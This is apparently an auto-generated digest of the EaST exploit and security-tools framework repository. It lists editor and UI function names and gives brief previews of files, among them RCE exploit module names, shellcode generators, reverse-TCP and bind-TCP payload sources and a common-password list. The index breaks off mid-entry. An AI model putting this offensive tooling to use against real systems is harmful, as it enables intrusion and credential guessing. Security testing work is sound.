function extendRange (line 1079) | function extendRange(doc, range, head, other) {
function extendSelection (line 1098) | function extendSelection(doc, head, other, options) {
function extendSelections (line 1104) | function extendSelections(doc, heads, options) {
function replaceOneSelection (line 1112) | function replaceOneSelection(doc, i, range, options) {
function setSimpleSelection (line 1119) | function setSimpleSelection(doc, anchor, head, options) {
function filterSelectionChange (line 1125) | function filterSelectionChange(doc, sel) {
function setSelectionReplaceHistory (line 1141) | function setSelectionReplaceHistory(doc, sel, options) {
function setSelection (line 1152) | function setSelection(doc, sel, options) {
function setSelectionNoUndo (line 1157) | function setSelectionNoUndo(doc, sel, options) {
function setSelectionInner (line 1169) | function setSelectionInner(doc, sel) {
function reCheckSelection (line 1183) | function reCheckSelection(doc) {
function skipAtomicInSelection (line 1189) | function skipAtomicInSelection(doc, sel, bias, mayClear) {
function skipAtomic (line 1204) | function skipAtomic(doc, pos, bias, mayClear) {
function drawSelection (line 1257) | function drawSelection(cm) {
function showSelection (line 1284) | function showSelection(cm, drawn) {
function updateSelection (line 1293) | function updateSelection(cm) {
function drawSelectionCursor (line 1298) | function drawSelectionCursor(cm, range, output) {
function drawSelectionRange (line 1317) | function drawSelectionRange(cm, range, output) {
function restartBlink (line 1391) | function restartBlink(cm) {
function startWorker (line 1407) | function startWorker(cm, time) {
function highlightWorker (line 1412) | function highlightWorker(cm) {
function findStartLine (line 1454) | function findStartLine(cm, n, precise) {
function getStateBefore (line 1470) | function getStateBefore(cm, n, precise) {
function paddingTop (line 1488) | function paddingTop(display) {return display.lineSpace.offsetTop;}
function paddingVert (line 1489) | function paddingVert(display) {return display.mover.offsetHeight - displ...
function paddingH (line 1490) | function paddingH(display) {
function ensureLineHeights (line 1503) | function ensureLineHeights(cm, lineView, rect) {
function mapFromLineView (line 1524) | function mapFromLineView(lineView, line, lineN) {
function updateExternalMeasurement (line 1537) | function updateExternalMeasurement(cm, line) {
function measureChar (line 1550) | function measureChar(cm, line, ch, bias) {
function findViewForLine (line 1555) | function findViewForLine(cm, lineN) {
function prepareMeasureForLine (line 1568) | function prepareMeasureForLine(cm, line) {
function measureCharPrepared (line 1588) | function measureCharPrepared(cm, prepared, ch, bias, varHeight) {
function measureCharInner (line 1610) | function measureCharInner(cm, prepared, ch, bias) {
function maybeUpdateRectForZooming (line 1702) | function maybeUpdateRectForZooming(measure, rect) {
function clearLineMeasurementCacheFor (line 1712) | function clearLineMeasurementCacheFor(lineView) {
function clearLineMeasurementCache (line 1721) | function clearLineMeasurementCache(cm) {
function clearCaches (line 1728) | function clearCaches(cm) {
function pageScrollX (line 1735) | function pageScrollX() { return window.pageXOffset || (document.document...
function pageScrollY (line 1736) | function pageScrollY() { return window.pageYOffset || (document.document...
function intoCoordSystem (line 1741) | function intoCoordSystem(cm, lineObj, rect, context) {
function fromCoordSystem (line 1763) | function fromCoordSystem(cm, coords, context) {
function charCoords (line 1780) | function charCoords(cm, pos, context, lineObj, bias) {
function cursorCoords (line 1788) | function cursorCoords(cm, pos, context, lineObj, preparedMeasure, varHei...
function estimateCoords (line 1820) | function estimateCoords(cm, pos) {
function PosWithInfo (line 1834) | function PosWithInfo(line, ch, outside, xRel) {
function coordsChar (line 1843) | function coordsChar(cm, x, y) {
function coordsCharInner (line 1864) | function coordsCharInner(cm, lineObj, lineNo, x, y) {
function textHeight (line 1906) | function textHeight(display) {
function charWidth (line 1926) | function charWidth(display) {
function startOperation (line 1948) | function startOperation(cm) {
function fireCallbacksForOps (line 1975) | function fireCallbacksForOps(group) {
function endOperation (line 1992) | function endOperation(cm) {
function endOperations (line 2007) | function endOperations(group) {
function endOperation_R1 (line 2021) | function endOperation_R1(op) {
function endOperation_W1 (line 2033) | function endOperation_W1(op) {
function endOperation_R2 (line 2037) | function endOperation_R2(op) {
function endOperation_W2 (line 2056) | function endOperation_W2(op) {
function endOperation_finish (line 2079) | function endOperation_finish(op) {
function runInOp (line 2135) | function runInOp(cm, f) {
function operation (line 2142) | function operation(cm, f) {
function methodOp (line 2152) | function methodOp(f) {
function docMethodOp (line 2160) | function docMethodOp(f) {
function LineView (line 2175) | function LineView(doc, line, lineN) {
function buildViewArray (line 2187) | function buildViewArray(cm, from, to) {
function regChange (line 2203) | function regChange(cm, from, to, lendiff) {
function regLineChange (line 2268) | function regLineChange(cm, line, type) {
function resetView (line 2282) | function resetView(cm) {
function findViewIndex (line 2290) | function findViewIndex(cm, n) {
function viewCuttingPoint (line 2301) | function viewCuttingPoint(cm, oldN, newN, dir) {
function adjustView (line 2327) | function adjustView(cm, from, to) {
function countDirtyView (line 2348) | function countDirtyView(cm) {
function slowPoll (line 2361) | function slowPoll(cm) {
function fastPoll (line 2372) | function fastPoll(cm) {
function readInput (line 2394) | function readInput(cm) {
function resetInput (line 2486) | function resetInput(cm, typing) {
function focusInput (line 2504) | function focusInput(cm) {
function ensureFocus (line 2509) | function ensureFocus(cm) {
function isReadOnly (line 2513) | function isReadOnly(cm) {
function registerEventHandlers (line 2520) | function registerEventHandlers(cm) {
function onResize (line 2654) | function onResize(cm) {
function eventInWidget (line 2664) | function eventInWidget(display, e) {
function posFromMouse (line 2675) | function posFromMouse(cm, e, liberal, forRect) {
function onMouseDown (line 2699) | function onMouseDown(e) {
function leftButtonDown (line 2737) | function leftButtonDown(cm, e, start) {
function leftButtonStartDrag (line 2761) | function leftButtonStartDrag(cm, e, start, modifier) {
function leftButtonSelect (line 2788) | function leftButtonSelect(cm, e, start, type, addNew) {
function gutterEvent (line 2927) | function gutterEvent(cm, e, type, prevent, signalfn) {
function clickInGutter (line 2950) | function clickInGutter(cm, e) {
function onDrop (line 2958) | function onDrop(e) {
function onDragStart (line 3008) | function onDragStart(cm, e) {
function setScrollTop (line 3034) | function setScrollTop(cm, val) {
function setScrollLeft (line 3045) | function setScrollLeft(cm, val, isScroller) {
function onScrollWheel (line 3075) | function onScrollWheel(cm, e) {
function doHandleBinding (line 3150) | function doHandleBinding(cm, bound, dropShift) {
function allKeyMaps (line 3171) | function allKeyMaps(cm) {
function handleKeyBinding (line 3180) | function handleKeyBinding(cm, e) {
function handleCharBinding (line 3217) | function handleCharBinding(cm, e, ch) {
function onKeyDown (line 3229) | function onKeyDown(e) {
function showCrossHair (line 3250) | function showCrossHair(cm) {
function onKeyUp (line 3265) | function onKeyUp(e) {
function onKeyPress (line 3270) | function onKeyPress(e) {
function onFocus (line 3284) | function onFocus(cm) {
function onBlur (line 3301) | function onBlur(cm) {
function onContextMenu (line 3316) | function onContextMenu(cm, e) {
function contextMenuInGutter (line 3391) | function contextMenuInGutter(cm, e) {
function adjustForChange (line 3408) | function adjustForChange(pos, change) {
function computeSelAfterChange (line 3417) | function computeSelAfterChange(doc, change) {
function offsetPos (line 3427) | function offsetPos(pos, old, nw) {
function computeReplacedSel (line 3436) | function computeReplacedSel(doc, changes, hint) {
function filterChange (line 3456) | function filterChange(doc, change, update) {
function makeChange (line 3480) | function makeChange(doc, change, ignoreReadOnly) {
function makeChangeInner (line 3502) | function makeChangeInner(doc, change) {
function makeChangeFromHistory (line 3520) | function makeChangeFromHistory(doc, type, allowSelectionOnly) {
function shiftDoc (line 3586) | function shiftDoc(doc, distance) {
function makeChangeSingleDoc (line 3602) | function makeChangeSingleDoc(doc, change, selAfter, spans) {
function makeChangeSingleDocInEditor (line 3635) | function makeChangeSingleDocInEditor(cm, change, spans) {
function replaceRange (line 3692) | function replaceRange(doc, code, from, to, origin) {
function maybeScrollWindow (line 3703) | function maybeScrollWindow(cm, coords) {
function scrollPosIntoView (line 3721) | function scrollPosIntoView(cm, pos, end, margin) {
function scrollIntoView (line 3744) | function scrollIntoView(cm, x1, y1, x2, y2) {
function calculateScrollPos (line 3754) | function calculateScrollPos(cm, x1, y1, x2, y2) {
function addToScrollPos (line 3785) | function addToScrollPos(cm, left, top) {
function ensureCursorVisible (line 3795) | function ensureCursorVisible(cm) {
function resolveScrollToPos (line 3809) | function resolveScrollToPos(cm) {
function indentLine (line 3829) | function indentLine(cm, n, how, aggressive) {
function changeLine (line 3890) | function changeLine(doc, handle, changeType, op) {
function deleteNearSelection (line 3901) | function deleteNearSelection(cm, compute) {
function findPosH (line 3933) | function findPosH(doc, pos, dir, unit, visually) {
function findPosV (line 3984) | function findPosV(cm, pos, dir, unit) {
function interpret (line 4409) | function interpret(val) {
function option (line 4465) | function option(name, deflt, handle, notOnInit) {
function getKeyMap (line 4897) | function getKeyMap(val) {
function lookup (line 4907) | function lookup(map) {
function save (line 4967) | function save() {textarea.value = cm.getValue();}
function markText (line 5210) | function markText(doc, from, to, options, type) {
function markTextShared (line 5303) | function markTextShared(doc, from, to, options, type) {
function findSharedMarkers (line 5318) | function findSharedMarkers(doc) {
function copySharedMarkers (line 5323) | function copySharedMarkers(doc, markers) {
function detachSharedMarkers (line 5335) | function detachSharedMarkers(markers) {
function MarkedSpan (line 5351) | function MarkedSpan(marker, from, to) {
function getMarkedSpanFor (line 5357) | function getMarkedSpanFor(spans, marker) {
function removeMarkedSpan (line 5365) | function removeMarkedSpan(spans, span) {
function addMarkedSpan (line 5371) | function addMarkedSpan(line, span) {
function markedSpansBefore (line 5380) | function markedSpansBefore(old, startCh, isInsert) {
function markedSpansAfter (line 5391) | function markedSpansAfter(old, endCh, isInsert) {
function stretchSpansOverChange (line 5410) | function stretchSpansOverChange(doc, change) {
function clearEmptySpans (line 5471) | function clearEmptySpans(spans) {
function mergeOldSpans (line 5485) | function mergeOldSpans(doc, change) {
function removeReadOnlyRanges (line 5508) | function removeReadOnlyRanges(doc, from, to) {
function detachMarkedSpans (line 5537) | function detachMarkedSpans(line) {
function attachMarkedSpans (line 5544) | function attachMarkedSpans(line, spans) {
function extraLeft (line 5553) | function extraLeft(marker) { return marker.inclusiveLeft ? -1 : 0; }
function extraRight (line 5554) | function extraRight(marker) { return marker.inclusiveRight ? 1 : 0; }
function compareCollapsedMarkers (line 5559) | function compareCollapsedMarkers(a, b) {
function collapsedSpanAtSide (line 5572) | function collapsedSpanAtSide(line, start) {
function collapsedSpanAtStart (line 5582) | function collapsedSpanAtStart(line) { return collapsedSpanAtSide(line, t...
function collapsedSpanAtEnd (line 5583) | function collapsedSpanAtEnd(line) { return collapsedSpanAtSide(line, fal...
function conflictingCollapsedRange (line 5588) | function conflictingCollapsedRange(doc, lineNo, from, to, marker) {
function visualLine (line 5608) | function visualLine(line) {
function visualLineContinued (line 5617) | function visualLineContinued(line) {
function visualLineNo (line 5628) | function visualLineNo(doc, lineN) {
function visualLineEndNo (line 5635) | function visualLineEndNo(doc, lineN) {
function lineIsHidden (line 5647) | function lineIsHidden(doc, line) {
function lineIsHiddenInner (line 5658) | function lineIsHiddenInner(doc, line, span) {
function adjustScrollWhenAboveVisible (line 5686) | function adjustScrollWhenAboveVisible(cm, line, diff) {
function widgetHeight (line 5715) | function widgetHeight(widget) {
function addLineWidget (line 5726) | function addLineWidget(cm, handle, node, options) {
function updateLine (line 5760) | function updateLine(line, text, markedSpans, estimateHeight) {
function cleanUpLine (line 5772) | function cleanUpLine(line) {
function extractLineClasses (line 5777) | function extractLineClasses(type, output) {
function callBlankLine (line 5791) | function callBlankLine(mode, state) {
function readToken (line 5798) | function readToken(mode, stream, state) {
function runMode (line 5807) | function runMode(cm, text, mode, state, f, lineClasses, forceToEnd) {
function highlightLine (line 5844) | function highlightLine(cm, line, state, forceToEnd) {
function getLineStyles (line 5882) | function getLineStyles(cm, line) {
function processLine (line 5895) | function processLine(cm, text, state, startAt) {
function interpretTokenStyle (line 5910) | function interpretTokenStyle(style, options) {
function buildLineContent (line 5922) | function buildLineContent(cm, lineView) {
function defaultSpecialCharPlaceholder (line 5970) | function defaultSpecialCharPlaceholder(ch) {
function buildToken (line 5978) | function buildToken(builder, text, style, startStyle, endStyle, title) {
function buildTokenSplitSpaces (line 6028) | function buildTokenSplitSpaces(inner) {
function buildTokenBadBidi (line 6042) | function buildTokenBadBidi(inner, order) {
function buildCollapsedSpan (line 6061) | function buildCollapsedSpan(builder, size, marker, ignoreWidget) {
function insertLineContent (line 6072) | function insertLineContent(line, builder, styles) {
function isWholeLineUpdate (line 6136) | function isWholeLineUpdate(doc, change) {
function updateDoc (line 6142) | function updateDoc(doc, change, markedSpans, estimateHeight) {
function LeafChunk (line 6200) | function LeafChunk(lines) {
function BranchChunk (line 6240) | function BranchChunk(children) {
function linkedDocs (line 6689) | function linkedDocs(doc, f, sharedHistOnly) {
function attachDoc (line 6704) | function attachDoc(cm, doc) {
function getLine (line 6718) | function getLine(doc, n) {
function getBetween (line 6733) | function getBetween(doc, start, end) {
function getLines (line 6745) | function getLines(doc, from, to) {
function updateLineHeight (line 6753) | function updateLineHeight(line, height) {
function lineNo (line 6760) | function lineNo(line) {
function lineAtHeight (line 6774) | function lineAtHeight(chunk, h) {
function heightAtLine (line 6795) | function heightAtLine(lineObj) {
function getOrder (line 6817) | function getOrder(line) {
function History (line 6825) | function History(startGen) {
function historyChangeFromChange (line 6842) | function historyChangeFromChange(doc, change) {
function clearSelectionEvents (line 6851) | function clearSelectionEvents(array) {
function lastChangeEvent (line 6861) | function lastChangeEvent(hist, force) {
function addChangeToHistory (line 6876) | function addChangeToHistory(doc, change, selAfter, opId) {
function selectionEventCanBeMerged (line 6918) | function selectionEventCanBeMerged(doc, origin, prev, sel) {
function addSelectionToHistory (line 6931) | function addSelectionToHistory(doc, sel, opId, options) {
function pushSelectionToHistory (line 6953) | function pushSelectionToHistory(sel, dest) {
function attachLocalSpans (line 6960) | function attachLocalSpans(doc, change, from, to) {
function removeClearedSpans (line 6971) | function removeClearedSpans(spans) {
function getOldSpans (line 6981) | function getOldSpans(doc, change) {
function copyHistoryArray (line 6991) | function copyHistoryArray(events, newGroup, instantiateSel) {
function rebaseHistSelSingle (line 7016) | function rebaseHistSelSingle(pos, from, to, diff) {
function rebaseHistArray (line 7032) | function rebaseHistArray(array, from, to, diff) {
function rebaseHist (line 7060) | function rebaseHist(hist, change) {
function e_defaultPrevented (line 7079) | function e_defaultPrevented(e) {
function e_target (line 7084) | function e_target(e) {return e.target || e.srcElement;}
function e_button (line 7085) | function e_button(e) {
function signalLater (line 7142) | function signalLater(emitter, type /*, values...*/) {
function fireOrphanDelayed (line 7159) | function fireOrphanDelayed() {
function signalDOMEvent (line 7168) | function signalDOMEvent(cm, e, override) {
function signalCursorActivity (line 7173) | function signalCursorActivity(cm) {
function hasHandler (line 7181) | function hasHandler(emitter, type) {
function eventMixin (line 7188) | function eventMixin(ctor) {
function Delayed (line 7205) | function Delayed() {this.id = null;}
function findColumn (line 7230) | function findColumn(string, goal, tabSize) {
function spaceStr (line 7245) | function spaceStr(n) {
function lst (line 7251) | function lst(arr) { return arr[arr.length-1]; }
function indexOf (line 7259) | function indexOf(array, elt) {
function map (line 7265) | function map(array, f) {
function createObj (line 7272) | function createObj(base, props) {
function copyObj (line 7285) | function copyObj(obj, target, overwrite) {
function bind (line 7293) | function bind(f) {
function isWordChar (line 7303) | function isWordChar(ch, helper) {
function isEmpty (line 7309) | function isEmpty(obj) {
function isExtendingChar (line 7320) | function isExtendingChar(ch) { return ch.charCodeAt(0) >= 768 && extendi...
function elt (line 7324) | function elt(tag, content, className, style) {
function removeChildren (line 7349) | function removeChildren(e) {
function removeChildrenAndAdd (line 7355) | function removeChildrenAndAdd(parent, e) {
function contains (line 7359) | function contains(parent, child) {
function activeElt (line 7366) | function activeElt() { return document.activeElement; }
function classTest (line 7374) | function classTest(cls) { return new RegExp("\\b" + cls + "\\b\\s*"); }
function rmClass (line 7375) | function rmClass(node, cls) {
function addClass (line 7379) | function addClass(node, cls) {
function joinClasses (line 7382) | function joinClasses(a, b) {
function forEachCodeMirror (line 7395) | function forEachCodeMirror(f) {
function ensureGlobalHandlers (line 7405) | function ensureGlobalHandlers() {
function registerGlobalHandlers (line 7410) | function registerGlobalHandlers() {
function scrollbarWidth (line 7438) | function scrollbarWidth(measure) {
function zeroWidthElement (line 7448) | function zeroWidthElement(measure) {
function hasBadBidiRects (line 7461) | function hasBadBidiRects(measure) {
function hasBadZoomedRects (line 7508) | function hasBadZoomedRects(measure) {
function iterateBidiSections (line 7537) | function iterateBidiSections(order, from, to, f) {
function bidiLeft (line 7550) | function bidiLeft(part) { return part.level % 2 ? part.to : part.from; }
function bidiRight (line 7551) | function bidiRight(part) { return part.level % 2 ? part.from : part.to; }
function lineLeft (line 7553) | function lineLeft(line) { var order = getOrder(line); return order ? bid...
function lineRight (line 7554) | function lineRight(line) {
function lineStart (line 7560) | function lineStart(cm, lineN) {
function lineEnd (line 7568) | function lineEnd(cm, lineN) {
function lineStartSmart (line 7578) | function lineStartSmart(cm, pos) {
function compareBidiLevel (line 7590) | function compareBidiLevel(order, a, b) {
function getBidiPartAt (line 7597) | function getBidiPartAt(order, pos) {
function moveInLine (line 7617) | function moveInLine(line, pos, dir, byUnit) {
function moveVisually (line 7629) | function moveVisually(line, start, dir, byUnit) {
function moveLogically (line 7652) | function moveLogically(line, start, dir, byUnit) {
function charType (line 7686) | function charType(code) {
function BidiSpan (line 7701) | function BidiSpan(level, from, to) {
FILE: ui/js/guiCommands.js
function genUUID4 (line 57) | function genUUID4() {
function bindEvent (line 63) | function bindEvent(event_type, callback) {
FILE: ui/js/main.js
function changeFavicon (line 236) | function changeFavicon(icon) {
function setDefaultInfo (line 252) | function setDefaultInfo() {
function showTabInfo (line 257) | function showTabInfo(tab) {
FILE: ui/js/rsvp.js
function resolve (line 38) | function resolve(child) {
function fulfilledResolver (line 141) | function fulfilledResolver(index) {
function rejectedResolver (line 147) | function rejectedResolver(index) {
function resolveAll (line 153) | function resolveAll(index, value) {
function fulfilled (line 172) | function fulfilled(value) {
function rejected (line 176) | function rejected(reason) {
function useNextTick (line 198) | function useNextTick() {
function useMutationObserver (line 204) | function useMutationObserver() {
function useSetTimeout (line 215) | function useSetTimeout() {
function flush (line 222) | function flush() {
function configure (line 254) | function configure(name, value) {
function filter (line 618) | function filter(promises, filterFn, label) {
function fulfilledTo (line 749) | function fulfilledTo(property) {
function onRejection (line 758) | function onRejection(reason) {
function makeNodeCallbackFor (line 922) | function makeNodeCallbackFor(resolve, reject) {
function noop (line 1045) | function noop() {}
function Promise (line 1145) | function Promise(resolver, label) {
function invokeResolver (line 1167) | function invokeResolver(resolver, promise) {
function subscribe (line 1194) | function subscribe(parent, child, onFulfillment, onRejection) {
function publish (line 1203) | function publish(promise, settled) {
function invokeCallback (line 1535) | function invokeCallback(settled, promise, callback, detail) {
function handleThenable (line 1565) | function handleThenable(promise, value) {
function resolve (line 1606) | function resolve(promise, value) {
function fulfill (line 1614) | function fulfill(promise, value) {
function reject (line 1622) | function reject(promise, reason) {
function publishFulfillment (line 1630) | function publishFulfillment(promise) {
function publishRejection (line 1634) | function publishRejection(promise) {
function fulfillmentAt (line 1715) | function fulfillmentAt(index) {
function onRejection (line 1724) | function onRejection(reason) {
function onFulfillment (line 1895) | function onFulfillment(value) { if (pending) { pending = false; resolve(...
function onRejection (line 1896) | function onRejection(reason) { if (pending) { pending = false; reject(r...
function objectOrFunction (line 2087) | function objectOrFunction(x) {
function isFunction (line 2091) | function isFunction(x) {
function isNonThenable (line 2095) | function isNonThenable(x) {
function isArray (line 2099) | function isArray(x) {
function async (line 2141) | function async(callback, arg) {
function on (line 2145) | function on() {
function off (line 2149) | function off() {
FILE: ui/js/serverCommands.js
function ServerCommandsHandler (line 1) | function ServerCommandsHandler() {
FILE: ui/js/ws.js
function doSend (line 118) | function doSend(message, callback){
function bindEvent (line 123) | function bindEvent(event_type, callback) {
FILE: ui/mode/python/python.js
function wordRegexp (line 14) | function wordRegexp(words) {
function top (line 44) | function top(state) {
function tokenBase (line 87) | function tokenBase(stream, state) {
function tokenBaseInner (line 108) | function tokenBaseInner(stream, state) {
function tokenStringFactory (line 191) | function tokenStringFactory(delimiter) {
function pushScope (line 224) | function pushScope(stream, state, type) {
function dedent (line 236) | function dedent(stream, state) {
function tokenLexer (line 245) | function tokenLexer(stream, state) {
Condensed preview — 80 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (746K chars).
[
{
"path": ".gitignore",
"chars": 80,
"preview": "*.pyc\nReports/\nLogs/\n/.idea\n/tmp/Webserver20160906100204\n/OUTPUTS\n/tmp\nexploits\n"
},
{
"path": "3rdParty/ef_armo_pack_demo/LICENSE.txt",
"chars": 40,
"preview": "https://www.gnu.org/licenses/gpl-3.0.txt"
},
{
"path": "3rdParty/ef_armo_pack_demo/changelog.txt",
"chars": 1760,
"preview": "\n1.0\nSeptember 18, 2022\n\nefa_acunetix_sbo.py\nefa_adobe_coldfusion_2018_rce.py\nefa_apache_struts_rce.py\nefa_apache_tomcat"
},
{
"path": "3rdParty/ef_scada_pack_demo/LICENSE.txt",
"chars": 40,
"preview": "https://www.gnu.org/licenses/gpl-3.0.txt"
},
{
"path": "3rdParty/ef_scada_pack_demo/changelog.txt",
"chars": 1886,
"preview": "\n1.0\nSeptember 18, 2022\n\nefa_delta_mcis_upsentry2012_info_disclosure.py\nefa_open_source_erp_arbitrary_sql_execution.py\ne"
},
{
"path": "3rdParty/readme.txt",
"chars": 140,
"preview": "Add packs here. The license for 3rd party's should be the same as for East.\nYou should put exploits to directory \"your_p"
},
{
"path": "README.md",
"chars": 2666,
"preview": "![EaST Framework](https://github.com/C0reL0ader/EaST/blob/master/logo.png \"EaST Framework\")\n# «EAST» – «Exploits And Sec"
},
{
"path": "core/BruteForcer.py",
"chars": 2577,
"preview": "#!/usr/bin/python\n\nimport sys\nimport os.path\nfrom threading import RLock, Thread\n\nRESOURCE_DIR = \"./\"\n\n\nclass BruteForce"
},
{
"path": "core/Commands.py",
"chars": 17862,
"preview": "# coding=utf-8\nimport os\nimport subprocess\nimport sys\nimport json\nimport logging\nimport inspect\nimport Modules\nimport Po"
},
{
"path": "core/DirectoryTraversal.py",
"chars": 1708,
"preview": "# simple class for directory traversal vulnerbility\nclass DirTrav:\n\n\tdef __init__(self):\n\t\tself.xpath = []\n\t\tself.xpath."
},
{
"path": "core/Modules.py",
"chars": 10032,
"preview": "import datetime\nimport sys\nimport os\nimport imp\nimport logging\nimport traceback\nfrom modulefinder import ModuleFinder\n\n"
},
{
"path": "core/OptionsParser.py",
"chars": 1613,
"preview": "from collections import OrderedDict\n\nclass OptionsParser:\n def __init__(self):\n pass\n\n def parse_data(self,"
},
{
"path": "core/PortScannerMT.py",
"chars": 4074,
"preview": "from __future__ import print_function\nimport socket\nimport sys\nimport threading\nimport Queue\n\n\nclass ScannerThread(threa"
},
{
"path": "core/ReportGenerator.py",
"chars": 3554,
"preview": "import os\nimport time\nclass ReportGenerator:\n def __init__(self):\n self.path_to_templates = os.getcwd() + \"/da"
},
{
"path": "core/ServiceMessagesHandler.py",
"chars": 2486,
"preview": "from itertools import groupby\n\nclass ServiceMessageLevel:\n DEBUG = 1\n INFO = 2\n WARNING = 3\n ERROR = 4\n\n\ncla"
},
{
"path": "core/Sploit.py",
"chars": 8113,
"preview": "#!/usr/bin/env python\nimport sys\nimport traceback\nimport time\nimport os\nimport json\nimport logging\nimport socket\nimport"
},
{
"path": "core/WebHelper.py",
"chars": 9822,
"preview": "import mimetypes\nimport os\nimport time\nimport cookielib\nimport urllib2\nimport urllib\nimport threading\nfrom BaseHTTPServe"
},
{
"path": "core/WebSocketServer.py",
"chars": 9144,
"preview": "# -*- coding: UTF-8 -*-\nimport Queue\nimport asyncore\nimport errno\nimport json\nimport logging\nimport struct\nfrom StringIO"
},
{
"path": "core/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "core/helpers/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "core/helpers/archieve/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "core/helpers/archieve/jar.py",
"chars": 1397,
"preview": "from zip import Zip\nimport os\n\nclass Jar(Zip):\n def __init__(self, filename=''):\n Zip.__init__(self, filename)"
},
{
"path": "core/helpers/archieve/zip.py",
"chars": 1123,
"preview": "import zipfile\nimport os\n\nclass Zip:\n def __init__(self, filename=''):\n self.name = filename\n self.file"
},
{
"path": "core/helpers/java/Serialization.py",
"chars": 32862,
"preview": "import struct\n\n\nclass Constants:\n STREAM_MAGIC = 0xaced\n STREAM_VERSION = 5\n TC_NULL = 0x70\n TC_REFERENCE = "
},
{
"path": "core/helpers/java/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "core/passwords.txt",
"chars": 3493,
"preview": "123456\npassword\n12345678\n1234\npussy\n12345\ndragon\nqwerty\n696969\nmustang\nletmein\nbaseball\nmaster\nmichael\nfootball\nshadow\nm"
},
{
"path": "data/CVE-2015-8103/serialized_payload_header",
"chars": 35,
"preview": "<===[JENKINS REMOTING CAPACITY]===>"
},
{
"path": "data/report_templates/common.html",
"chars": 773,
"preview": "<!DOCTYPE html>\n<html>\n<head>\n <meta charset=\"utf-8\">\n <title>Report</title>\n <style>\n .succeeded {\n "
},
{
"path": "data/report_templates/row_template.html",
"chars": 520,
"preview": " <div class=\"category_row {CLASS}\">\n <div class=\"entry\" style=\"font-size:22px;\">Name: {MODULE_NAME} ({IS_SUCCESS})</d"
},
{
"path": "docs/files/template.py",
"chars": 1335,
"preview": "#!/usr/bin/env python\n\n#IMPORTS SECTION\nfrom collections import OrderedDict # for rigth options order\nfrom Sploit impor"
},
{
"path": "docs/files/vulnserver_bof/vulnserver_buffer_overflow.py",
"chars": 3344,
"preview": "#!/usr/bin/env python\n\n#IMPORTS SECTION\nfrom collections import OrderedDict # for rigth options order\nfrom Sploit impor"
},
{
"path": "docs/index.html",
"chars": 376,
"preview": "<!DOCTYPE html>\n<html>\n<head>\n\t<title>EaST Tutorials</title>\n\t<script type=\"text/javascript\" src='js/bootstrap.min.js'><"
},
{
"path": "help/README.txt",
"chars": 5,
"preview": " "
},
{
"path": "listener/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "listener/bind_connector.py",
"chars": 2833,
"preview": "import socket\nimport asyncore\nimport os, sys\nimport select\nimport errno\nfrom websocket import create_connection\nfrom Com"
},
{
"path": "listener/listener.py",
"chars": 4074,
"preview": "# -*- coding: utf-8 -*-\nimport Queue\nimport sys, os\nimport asyncore\nimport socket\nimport json\nimport logging\nimport errn"
},
{
"path": "shellcodes/Asm.py",
"chars": 24479,
"preview": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom ctypes import *\nfrom ShellUtils import *\n\n\nclass ShellGenerator:\n def"
},
{
"path": "shellcodes/DotNetShellcode.py",
"chars": 3066,
"preview": "import os\nfrom shellcode import Shellcode\n\nclass AspxShellcode(Shellcode):\n \"\"\"\n Class with shellcodes for jav"
},
{
"path": "shellcodes/Encoders.py",
"chars": 21073,
"preview": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom random import *\nimport sys\n\nfrom Runshellcode import RunShellcode\nfrom S"
},
{
"path": "shellcodes/JavaShellcode.py",
"chars": 3402,
"preview": "import os\nfrom shellcode import Shellcode\nfrom core.helpers.archieve.jar import Jar\nfrom ShellUtils import Constants, re"
},
{
"path": "shellcodes/PhpShellcode.py",
"chars": 2150,
"preview": "from shellcode import Shellcode\n\n\nclass PhpShellcodes(Shellcode):\n \"\"\"\n Class with shellcodes for php language"
},
{
"path": "shellcodes/PythonShellcode.py",
"chars": 1870,
"preview": "from shellcode import Shellcode\nclass PythonShellcodes(Shellcode):\n \"\"\"\n Class with shellcodes for python lang"
},
{
"path": "shellcodes/README",
"chars": 143,
"preview": "Generate shellcodes are tested on:\n1. WIN 32bit XP SP2\n2. WIN 32bit 7 Ultimate\n3. Linux 3.13.0-57-generic Ubuntu x86_64 "
},
{
"path": "shellcodes/Runshellcode.py",
"chars": 4771,
"preview": "#!/usr/bin/python\nimport ctypes\nfrom Encoders import *\nfrom Shellcodes import *\nfrom ast import literal_eval\nfrom ShellU"
},
{
"path": "shellcodes/ShellUtils.py",
"chars": 10208,
"preview": "import os\nimport time\nfrom subprocess import call, Popen, PIPE\nfrom shutil import rmtree\nfrom platform import system, ma"
},
{
"path": "shellcodes/ShellcodeGenerator.py",
"chars": 16979,
"preview": "from ShellUtils import *\nimport time\nimport os\n\n\nclass ShellGenerator:\n def __init__(self, os_target, os_target_arch)"
},
{
"path": "shellcodes/Shellcodes.py",
"chars": 7431,
"preview": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport base64\n\neast_path = os.path.join(os.path.dirname(o"
},
{
"path": "shellcodes/__init__.py",
"chars": 1,
"preview": "\n"
},
{
"path": "shellcodes/data/java/src/ReverseTCP/Payload.java",
"chars": 2279,
"preview": "package east;\n\nimport java.io.*;\nimport java.net.*;\n\npublic class Payload extends ClassLoader{\n\tprivate static String OS"
},
{
"path": "shellcodes/data/linux/src/bind_tcp.asm",
"chars": 655,
"preview": "global _start\n\nsection .text\n_start:\n\tpush 0x66\n\tpop eax\n\tpush 0x1\n\tpop ebx\n\txor esi, esi\n\tpush esi\n\tpush ebx\n\tpush 0x2\n"
},
{
"path": "shellcodes/data/linux/src/reverse_tcp.asm",
"chars": 5282,
"preview": "BITS 32\n\nglobal _start\n\n_start:\n ; =============================== SOCKET =====================================\n "
},
{
"path": "shellcodes/data/linux/x64/src/bind_tcp.asm",
"chars": 689,
"preview": "BITS 64\nglobal _start\nsection .text\n\n_start:\n push 0x29\n pop rax\n cdq\n push 0x2\n pop rdi\n pu"
},
{
"path": "shellcodes/data/linux/x64/src/reverse_tcp.asm",
"chars": 2243,
"preview": "BITS 64\nglobal _start\n\n; settings\n;IP equ 0x0100007f ; default 127.0.0.1, contains nulls so will need mask\nIP "
},
{
"path": "shellcodes/data/windows/src/bind_tcp.asm",
"chars": 2465,
